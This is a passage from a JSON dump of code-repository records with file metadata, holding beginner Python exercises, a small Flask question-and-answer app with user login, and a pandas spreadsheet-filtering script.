"text": "string=str(raw_input(\"enter string :\"))\nforward=[]\nbackward=[]\ni = 0\ni2 = 0\nfor c in string:\n forward.append(c)\nfor d in reversed(forward):\n backward.append(d)\n\n# backward = forward[::-1]\n\n\n\nif cmp(forward,backward) == 0:\n print (\"Lists are palindromes\")\n\n\nprint (\"backward :\" +str(forward))\nprint (\"backward :\" +str(backward))\n\n"
},
{
"alpha_fraction": 0.6741379499435425,
"alphanum_fraction": 0.6775861978530884,
"avg_line_length": 22.15999984741211,
"blob_id": "2d186e507a4c6333c7fa6df4766877991ad39aa2",
"content_id": "d777fdb925fbcdfb602f72a717ca65adb4745458",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 25,
"path": "/task22.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import os\nmylist=[]\ndir=os.getcwd()\nprint (dir) \n\ndef openfile2(myfile):\n with open(myfile) as f:\n #read file and strip end of line symbols while file is read\n content = f.readline()\n while content:\n mylist.append(content.strip()) \n content=f.readline()\n print mylist\n\n# List Separate list with Uniq items\n uniq = set(mylist)\n print uniq \n # strip values from end of symbol values\n #uniq = [elem.strip().split(',')for elem in uniq]\n for elem in uniq:\n num=mylist.count(elem)\n print str(elem) +\":\"+ str(num) \n\nmyfile = dir+\"/nameslist.txt\"\nopenfile2(myfile)\n\n"
},
{
"alpha_fraction": 0.6341772079467773,
"alphanum_fraction": 0.6430379748344421,
"avg_line_length": 19.657894134521484,
"blob_id": "e730b0536e6863d15a5f0ed9d7a7e5785489fbcd",
"content_id": "cdfec9cb854480dd2530d15db7a125da7b3aa756",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 790,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 38,
"path": "/task19.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\n#text=[]\ni=''\n\ndef striphtml(data):\n p = re.compile(r'<.*?>')\n text=p.sub('', data)\n return text\n\ndef filenameexist(filename):\n if not filename:\n return\n else:\n f=open(filename,'w')\n f.write('')\n f.close\n\ndef writef(filename, data):\n f = open(filename,'a')\n f.write(data)\n f.close\n\n\nbase_url = 'https://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture'\nr = requests.get(base_url)\nsoup = BeautifulSoup(r.text,\"lxml\")\n#print soup.p.string\nfilenameexist('page.txt')\n\nfor story_text in soup.findAll(['data-reactid=','p']):\n item=striphtml(str(story_text))\n #text.append(item)\n #text.append('/n')\n #print(text)\n print (item)\n writef('page.txt',item + \"\\n\") \n \n"
},
{
"alpha_fraction": 0.48897796869277954,
"alphanum_fraction": 0.5030060410499573,
"avg_line_length": 28.294116973876953,
"blob_id": "0a086e499e56b71b68df0ceabcab6905a0e65a4e",
"content_id": "5185c7f07849b309ba9d8a040b287fc6e1012cb9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/task28.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "def inputvalues():\n x=int(raw_input(\"Enter variable1: \"))\n y=int(raw_input(\"Enter variable2: \"))\n z=int(raw_input(\"Enter variable3: \"))\n\n if x>=y :\n if x>=z:\n print \"variable1 is max: \" + str(x)+ \" > \" +str(y)+\" > \"+ str(z)\n else:\n print \"variable3 is max: \" + str(z)+ \" > \" +str(x)+\" > \"+ str(y)\n else: \n if y>=z:\n print \"variable2 is max: \" + str(y)+ \" > \" +str(z)+\" > \"+ str(x)\n else:\n print \"variable3 is max: \" + str(z)+ \" > \" +str(x)+\" > \"+ str(y)\n\ninputvalues()\n\n"
},
{
"alpha_fraction": 0.5753424763679504,
"alphanum_fraction": 0.6050228476524353,
"avg_line_length": 23.27777862548828,
"blob_id": "d1e430fa9e21b53823f34ca93b27141bc97b03b2",
"content_id": "f51c56f0b770fb3e7aec2df5b0beceda347d8fa6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 18,
"path": "/task9.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\na=random.randint(0,10)\ni=1\n\nwhile i > 0:\n userinput = raw_input(\"Enter Guessed value (enter 'exit' for exit): \")\n if userinput == \"exit\":\n exit(0)\n else: \n if int(userinput) in range (1,10):\n if int(userinput) == a:\n print (\"Congrats !!! You Guessed the digit from \" +str(i) + \" attempts!\")\n exit(0)\n else:\n print (\"Wrong...Please try again...\") \n i=i+1 \n else:\n print(\"enter value between 0 and 9\")\n\n"
},
{
"alpha_fraction": 0.6524216532707214,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 14.863636016845703,
"blob_id": "cd32fc1713654ce2711e8a0172a5e21f297026a3",
"content_id": "1aebe82c66e0cda0bcc3356c44ca0efda1c86863",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 351,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 22,
"path": "/task6_03.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import sys\nreverse=[]\ncounter=0\n\nword=raw_input(\"enter a palindrome word : \") \ne=int(len(word))\n#print reversed(word)\n#sys.exit()\ni=e\n\nwhile int(i)>0:\n i=i-1\n reverse.append(word[i])\nprint \"reversed word \"+str(reverse)\n\nfor n in range(e):\n if reverse[n]==word[n]: \n counter=int(counter+1)\nif counter>0:\n print \"PALINDROME !!!\"\nelse:\n print \"NOOO\"\n\n\n"
},
{
"alpha_fraction": 0.6797020435333252,
"alphanum_fraction": 0.7113593816757202,
"avg_line_length": 18.88888931274414,
"blob_id": "73cbca2808383b0ea93143db2c9824d46adcddd6",
"content_id": "5ab8e0b36ba62069f45357761f8facb06877a0f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 537,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 27,
"path": "/task23.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "mylist1=[]\nmylist2=[]\nresultlist=[]\nimport os\ndir = os.getcwd()\n\nfile1=dir+\"/primenumbers.txt\"\nfile2=dir+\"/happynumbers.txt\"\n\ndef readfile(file1,mylist1):\n with open(file1,\"r\") as f:\n item=f.readline() \n while item:\n #print item\n mylist1.append(int(item))\n item=f.readline()\n print \"\\n File elements from \" + file1 \n print mylist1\n return mylist1\n\nreadfile(file1,mylist1)\nreadfile(file2,mylist2)\n\nresultlist=set(mylist1)&set(mylist2)\n\nprint \"\\n Result list of elements presented in both files\"\nprint sorted(resultlist)\n"
},
{
"alpha_fraction": 0.6237941980361938,
"alphanum_fraction": 0.6495176553726196,
"avg_line_length": 13.809523582458496,
"blob_id": "bea85dd327ac0319bf03b57ef3c3045ee0f27150",
"content_id": "6dd62af10a2fb7c2ba0ac5aef5afea49f3eddc07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 21,
"path": "/task4.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "num = int(raw_input(\"Enter a digit :\"))\ni=0\nlistresult=[]\nwhile i < 100:\n x=num*i\n listresult.append(x)\n i=i+1\n\nprint(listresult)\n\n\n#----How should be----\n\nlistrange=list(range(1,num+1))\ndivisorlist=[]\n\nfor number in listrange:\n if num % number == 0:\n divisorlist.append(number)\n\nprint (divisorlist)\n"
},
{
"alpha_fraction": 0.36320754885673523,
"alphanum_fraction": 0.5188679099082947,
"avg_line_length": 18.272727966308594,
"blob_id": "95d3667875cb43f6ea3fe2656b4ed71f82c99082",
"content_id": "9ffa8ac2213a49c16d961bbc86d0e46eec779e63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 11,
"path": "/task10.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nfrom sets import Set\nx=[]\na = Set([1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89])\nb = Set([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13])\n\n#x = a.intersection(b)\nx=a & b\n # x.append(i)\nfor i in x:\n print(i)\n"
},
{
"alpha_fraction": 0.579365074634552,
"alphanum_fraction": 0.6349206566810608,
"avg_line_length": 11.600000381469727,
"blob_id": "a04c9adf4a732f9125391adbf3fbac121e363c97",
"content_id": "56567a2958a2be75326e8c162da844b47c22cc1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 10,
"path": "/task12.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\na = random.sample(range(100),10)\n#print len(a)\nprint a\n\ndef slist(x):\n b =[x[0],x[len(x)-1]]\n print b\n\nslist(a)\n"
},
{
"alpha_fraction": 0.3333333432674408,
"alphanum_fraction": 0.5203251838684082,
"avg_line_length": 11.300000190734863,
"blob_id": "5c267bd1ffecf992e0c2011574cda524e7a5b197",
"content_id": "04e3c62c1f3b5c818b2b99cf43925dcc3f35c98b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 10,
"path": "/task14_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "a=[1,1,2,3,4,3,5,2,5,3,4,7,7,6,5,8,9,9,0,7,8,0,1]\n#print set(a)\n\nb=[]\n\nfor i in a: \n if i not in b:\n b.append(i)\n\nprint b\n"
},
{
"alpha_fraction": 0.5043103694915771,
"alphanum_fraction": 0.607758641242981,
"avg_line_length": 16.769229888916016,
"blob_id": "18b68fad5549b589092c634915feda81f74ecd0f",
"content_id": "43d134b19adf6a7e32e0cff638d09d18e4c5492c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 13,
"path": "/task7_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "\na = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]\n\n#Return even numbers\nb=[x for x in a if x%2==0]\nprint b\n\n#Sort By even numbers\ny=sorted(a, key=lambda v: (v%2==0, v))\nprint y\n\n#Return Odd numbers\nodd=[n for n in a if n%2 !=0]\nprint odd\n"
},
{
"alpha_fraction": 0.617977499961853,
"alphanum_fraction": 0.6292135119438171,
"avg_line_length": 25.649999618530273,
"blob_id": "4c518aa352bae9052b44566e350505ff6f464e6b",
"content_id": "c95f8ad7045b3044856cd8223cd88e2800abed09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 534,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 20,
"path": "/task2.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "num=int(raw_input(\"Enter any digit:\"))\ndivider=int(raw_input(\"enter divider: \"))\n\nresult=int(num) % 2\nfourresult=int(num) % 4\ncheck=int(num) % int(divider)\n\n#print(result)\nif result == 0:\n print (\"number \"+ str(num)+ \" even\")\nelse:\n print (\"number \" +str(num)+ \" is uneven\")\n\nif fourresult == 0:\n print (str(num)+\" number is a multiple of 4\")\n\nif check == 0:\n print (\"Num \" +str(num)+ \" divided evenly with divider \" +str(divider))\nelse:\n print (\"Num \" +str(num)+\" does not divide evenly with divider \"+str(divider) )\n\n"
},
{
"alpha_fraction": 0.6083333492279053,
"alphanum_fraction": 0.6166666746139526,
"avg_line_length": 23,
"blob_id": "f89d7fcc90f04f633e65b63e77f106e9212f51f2",
"content_id": "ccf21904a50ceee287e805880c8471a3975a2449",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 5,
"path": "/task6_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "word=raw_input(\"enter a palindrome word : \") \nif word[::-1]==word:\n print \"PALINDROME !!!\"\nelse:\n print \"NOOOOOO\"\n"
},
{
"alpha_fraction": 0.678260862827301,
"alphanum_fraction": 0.6834782361984253,
"avg_line_length": 26.33333396911621,
"blob_id": "4d051c2c2e7c962f6c1b73df3300f0ecc6079354",
"content_id": "7644a4a5d8505ac3f66522d94a837bae49efa2df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 21,
"path": "/task17.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport re\nimport requests\ntitles=[]\n\nurl='http://nyt.com'\nr = requests.get(url)\nr_html=r.text\n\ndef striphtml(data):\n p = re.compile(r'<.*?>')\n print p.sub('', data)\n\nsoup=BeautifulSoup(r_html,\"lxml\")\nfor story_heading in soup.findAll(['class=\"balancedHeadline\"','h2']): \n# print soup.get_text(story_heading)\n titles.append(str(story_heading))\n striphtml(str(story_heading))\n\n#import subprocess\n#process = subprocess.call(\"curl -ikLsv 'https://nytimes.com'| sed 's/,/\\n/g'| grep 'promotionalHeadline' | cut -d':' -f2\",shell=True)\n\n"
},
{
"alpha_fraction": 0.6262924671173096,
"alphanum_fraction": 0.6366322040557861,
"avg_line_length": 16.8157901763916,
"blob_id": "3aa02a8c13b86047ff719d906485f25c6c85c98a",
"content_id": "369cebbea8a0248877683735f6499bdf1423adc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 677,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 38,
"path": "/task11.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "def get_integer(text): \n# return int(raw_input(text))\n while True:\n try:\n return int(raw_input(text))\n break\n except ValueError:\n print \"Oops! That was no valid number. Try again...\"\n\n\nnum = get_integer(\"Enter integer :\")\n\ndivisorlist = []\n\n\nfor i in range(1,num+1):\n if num % i == 0:\n divisorlist.append(i)\nprint(divisorlist)\n\ndef divisor_def(i):\n if int(len(divisorlist)) == 2:\n print(\"Number entered is not even\")\n else:\n print (\"Number is even\")\n\ndivisor_def(i)\n\n\n#----How should be----\n\n# listrange=list(range(1,num+1))\n# divisorlist=[]\n\n# for number in listrange:\n# if num % number == 0:\n# divisorlist.append(number)\n# print (divisorlist)\n"
}
] | 33 |
TheVosges/ExcelEditor | https://github.com/TheVosges/ExcelEditor | 4884dc9f560a106252959d790856c63a43de52e9 | 80c2eedbc45f8b72d93b98f548b1df7a029b1eb8 | e7bab67b1ae0717ae650b388d93f26fef43670aa | refs/heads/main | 2023-07-24T05:48:16.231688 | 2021-08-19T11:11:31 | 2021-08-19T11:11:31 | 397,915,039 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8039215803146362,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 24,
"blob_id": "3046ef44ccae38d29950582aec438066c343e71e",
"content_id": "66fc783a634ab1f1d7a068c88d3c9683ce6e35c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 2,
"path": "/README.md",
"repo_name": "TheVosges/ExcelEditor",
"src_encoding": "UTF-8",
"text": "# ExcelEditor\nFile which deletes columns in excel \n"
},
{
"alpha_fraction": 0.5179760456085205,
"alphanum_fraction": 0.5399467349052429,
"avg_line_length": 28.079999923706055,
"blob_id": "20aa9fa272b937c0c09042301c2398c1c4a7906f",
"content_id": "731650be26c1dd544116e8d14765aeea36b1c05c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1502,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 50,
"path": "/to_csv_by_Arek.py",
"repo_name": "TheVosges/ExcelEditor",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 28 10:18:43 2021\r\n\r\n@author: R252202\r\n\"\"\"\r\nimport pandas as pd\r\nfrom openpyxl.workbook import Workbook\r\nfrom datetime import datetime\r\n\r\ndf = pd.read_clipboard()\r\n#print(df)\r\n\r\nwanted_values = df[[\"Product Value\", \"Product Description\", \"Value\", \"UOM\", \"Start Date\", \"End Date\"]]\r\n\r\n\r\ntoday = datetime.date(datetime.now())\r\nprint (today)\r\ni=0\r\nindexes = []\r\nfor cell in wanted_values[\"End Date\"]:\r\n i+=1\r\n try:\r\n #day = cell[:2]\r\n #month = cell[3:6]\r\n #datetime_object = datetime.strptime(month, \"%b\")\r\n #month_no = datetime_object.month\r\n #year = \"20\" + str(cell[7:])\r\n #date_str = str(year) + \"-\" + str(month_no) + \"-\" + str(day)\r\n if str(cell) != \"nan\":\r\n cell = str(cell)\r\n month_start = cell.find('-')\r\n month = cell[month_start+1:month_start+4]\r\n datetime_object = datetime.strptime(month, \"%b\")\r\n month_no = datetime_object.month\r\n date_obj = str(cell[:month_start]) + \"-\" + str(month_no) + \"-\" + \"20\" + str(cell[month_start+5:])\r\n date_obj = datetime.strptime(date_obj, \"%d-%m-%Y\")\r\n date_obj = date_obj.date()\r\n if date_obj < today:\r\n indexes.append(i-1)\r\n \r\n else:\r\n \r\n continue\r\n except TypeError:\r\n continue\r\n\r\nwanted_values = wanted_values.drop(indexes)\r\n\r\nstored = wanted_values.to_excel('Please_rename.xlsx', index = None )"
}
] | 2 |
Pythonian/flask-qa | https://github.com/Pythonian/flask-qa | 843825d186e720b56675ace0f9c2aad98328022b | f9cd424c5c678d0f22fa2a9553f43f1914220724 | 8f6f847f44d0009e224e580346178937fb029f9e | refs/heads/master | 2023-05-11T09:22:30.632968 | 2020-04-21T23:31:11 | 2020-04-21T23:31:11 | 257,740,244 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6344969272613525,
"alphanum_fraction": 0.6371103525161743,
"avg_line_length": 24.26886749267578,
"blob_id": "58469076dbba4f120a2124a9f65a4360fae4ff58",
"content_id": "f8c126b5e1fd88bd7aac958f12af970514c8e021",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5357,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 212,
"path": "/app.py",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, url_for\nfrom flask_login import (LoginManager, UserMixin,\n current_user, login_required, login_user, logout_user)\nfrom flask_sqlalchemy import SQLAlchemy\nfrom commands import create_tables\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\napp = Flask(__name__)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'login'\n\n\ndb = SQLAlchemy(app)\n\napp.config['SECRET_KEY'] = 'secret'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///qa.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\napp.cli.add_command(create_tables)\n\n\nclass User(UserMixin, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50))\n password_hash = db.Column(db.String(100))\n expert = db.Column(db.Boolean)\n admin = db.Column(db.Boolean)\n questions_asked = db.relationship(\n 'Question', foreign_keys='Question.asked_by_id',\n backref='asker', lazy=True)\n answers_requested = db.relationship(\n 'Question', foreign_keys='Question.expert_id',\n backref='expert', lazy=True)\n\n @property\n def password(self):\n raise AttributeError('Password is not a readable attribute')\n\n @password.setter\n def password(self, password):\n self.password_hash = generate_password_hash(password)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\nclass Question(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n question = db.Column(db.Text)\n answer = db.Column(db.Text)\n asked_by_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n expert_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n\[email protected]('/')\ndef index():\n questions = Question.query.filter(Question.answer is not None).all()\n context = {\n 'questions': questions\n }\n return render_template('home.html', **context)\n\n\n@login_required\[email protected]('/ask', methods=['GET', 'POST'])\ndef ask():\n if request.method == 'POST':\n question = request.form['question']\n expert = request.form['expert']\n\n question = Question(question=question,\n expert_id=expert, asked_by_id=current_user)\n\n db.session.add(question)\n db.session.commit()\n\n return redirect(url_for('index'))\n\n experts = User.query.filter_by(expert=True).all()\n\n return render_template('ask.html', experts=experts)\n\n\[email protected]('/answer/<int:question_id>', methods=['GET', 'POST'])\n@login_required\ndef answer(question_id):\n if not current_user.expert:\n return redirect(url_for('index'))\n\n question = Question.query.get_or_404(question_id)\n\n if request.method == 'POST':\n question.answer = request.form['answer']\n db.session.commit()\n\n return redirect(url_for('unanswered'))\n\n context = {\n 'question': question\n }\n\n return render_template('answer.html', **context)\n\n\[email protected]('/question/<int:question_id>')\ndef question(question_id):\n question = Question.query.get_or_404(question_id)\n\n context = {\n 'question': question\n }\n\n return render_template('question.html', **context)\n\n\[email protected]('/unanswered')\n@login_required\ndef unanswered():\n if not current_user.expert:\n return redirect(url_for('index'))\n\n unanswered_questions = Question.query\\\n .filter_by(expert_id=current_user.id)\\\n .filter(Question.answer is None)\\\n .all()\n\n context = {\n 'unanswered_questions': unanswered_questions\n }\n\n return render_template('unanswered.html', **context)\n\n\[email protected]('/users')\n@login_required\ndef users():\n if not current_user.admin:\n return redirect(url_for('index'))\n\n users = User.query.filter_by(admin=False).all()\n\n context = {\n 'users': users\n }\n\n return render_template('users.html', **context)\n\n\[email protected]('/promote/<int:user_id>')\n@login_required\ndef promote(user_id):\n if not current_user.admin:\n return redirect(url_for('index'))\n\n user = User.query.get_or_404(user_id)\n\n user.expert = True\n db.session.commit()\n\n return redirect(url_for('users'))\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n name = request.form['name']\n password_hash = request.form['password']\n\n user = User(\n name=name,\n password=password_hash,\n admin=False,\n expert=False\n )\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('login'))\n\n return render_template('register.html')\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n name = request.form['name']\n password = request.form['password']\n\n user = User.query.filter_by(name=name).first()\n\n error_message = ''\n\n if not user or not check_password_hash(user.password, password):\n error_message = 'Could not login. Please check and try again.'\n\n if not error_message:\n login_user(user)\n return redirect(url_for('index'))\n\n return render_template('login.html')\n\n\[email protected]('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n"
},
{
"alpha_fraction": 0.7636363506317139,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 13,
"blob_id": "1eb7f547c6a13d0afcd5079ae79efa052a2a3565",
"content_id": "a4a4a0ea4654da101e9b22cccdb10321f2caeeb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "Flask==1.1.1\nFlask-Login\nFlask-SQLAlchemy\npython-dotenv"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 17.399999618530273,
"blob_id": "b83ddc113da7a0960000602bfa5be286595e3949",
"content_id": "3fa4cc1582a16dd903fd124969b4dd9f7409251c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 10,
"path": "/commands.py",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "import click\nfrom flask.cli import with_appcontext\n\nfrom app import db, User, Question\n\n\[email protected](name='create_tables')\n@with_appcontext\ndef create_tables():\n db.create_all()\n"
},
{
"alpha_fraction": 0.7405063509941101,
"alphanum_fraction": 0.7405063509941101,
"avg_line_length": 30.600000381469727,
"blob_id": "7d6dcdbf0a824c466de4b4565778e421fef950d8",
"content_id": "7cc6a72c59677ee9ee0858c1acb91fc5a6bac655",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 5,
"path": "/settings.py",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "# import os\n\n# SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI')\n# SQLALCHEMY_TRACK_MODIFICATIONS = False\n# SECRET_KEY = os.getenv('SECRET_KEY')\n"
}
] | 4 |
yogesh696ksingh/DP-1 | https://github.com/yogesh696ksingh/DP-1 | ca74f7ec9fe74582dbb3864732d9a713beac6aae | b7eaf6be2a151810c3953b4b69f0bd54dd48e02d | 14ce83fb2b3aaa106b40edb1313c83dd78301243 | refs/heads/master | 2022-12-17T18:52:50.109311 | 2020-09-24T01:27:10 | 2020-09-24T01:27:10 | 298,131,497 | 0 | 0 | null | 2020-09-24T00:54:11 | 2020-06-29T01:28:39 | 2020-09-24T00:41:12 | null | [
{
"alpha_fraction": 0.5092748999595642,
"alphanum_fraction": 0.5328836441040039,
"avg_line_length": 28.649999618530273,
"blob_id": "f1f80726415a1814c38e365cd4973636a7d58a26",
"content_id": "591f94e6e28def987aac069253943fe88b33bd26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 628,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 20,
"path": "/Problem2.py",
"repo_name": "yogesh696ksingh/DP-1",
"src_encoding": "UTF-8",
"text": "# Time Complexity : O(n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : \n# Your code here along with comments explaining your approach\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n dp = [0]*len(nums)\n dp[0] = nums[0]\n dp[1] = max(nums[0], nums[1])\n \n for i in range(2, len(nums)):\n dp[i] = max(dp[i-2] + nums[i], dp[i - 1])\n \n return dp[len(dp)-1]\n"
},
{
"alpha_fraction": 0.5762711763381958,
"alphanum_fraction": 0.5889830589294434,
"avg_line_length": 38.33333206176758,
"blob_id": "f509ade967c8fa869151e988cc62b54b47b59ae9",
"content_id": "05ea079d5f85f59a5d22fb8edd7f63d623f5f0fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 18,
"path": "/Problem1.py",
"repo_name": "yogesh696ksingh/DP-1",
"src_encoding": "UTF-8",
"text": "# Time Complexity : O(S∗n). On each step the algorithm finds the next F(i) in n iterations, where 1≤i≤S. Therefore in total the iterations are S*n.\n# Space Complexity : O(S)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : \n# Your code here along with comments explaining your approach\n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n dp = [amount + 1] * (amount + 1)\n dp[0] = 0\n for coin in coins:\n for i in range(coin, amount+1):\n dp[i] = min(dp[i], dp[i - coin] + 1)\n \n if dp[amount] == amount + 1:\n return -1\n else:\n return dp[amount]\n"
}
] | 2 |
chouer19/zhuifengShow0919 | https://github.com/chouer19/zhuifengShow0919 | 1788fcdf267f05ec0ac48ce36343df52e2d3b64e | b17592854b0bacd39ca7eb9b388ad664e926f4af | 06bee4337cec04687f62987156cec508d756ef56 | refs/heads/master | 2020-03-28T06:03:29.385517 | 2018-09-18T06:52:49 | 2018-09-18T06:52:49 | 147,811,635 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6495327353477478,
"alphanum_fraction": 0.6915887594223022,
"avg_line_length": 25,
"blob_id": "f0a75f201568897e110ce27c995773453fc3b911",
"content_id": "23543236e7a73cfe0bf59ad034b3e5c4ba2cecba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 8,
"path": "/src/steer/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\nnode name : pure_pursuit\n\nsubscribed topics:\n gps_waypointsm, type is : zf_msgs::pose2dArray\n pos320_pose, type is : zf_msgs::pos320\n\npublished topics:\n pure_pursuit_steer, type is : std_msgs::int32\n \n"
},
{
"alpha_fraction": 0.7704517841339111,
"alphanum_fraction": 0.7997558116912842,
"avg_line_length": 57.5,
"blob_id": "092e5f0a2717ab445f9a22a4c2e6af593bf954f3",
"content_id": "fb08104d095ece5cd3cba21eead6e42193b40dfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 819,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 14,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
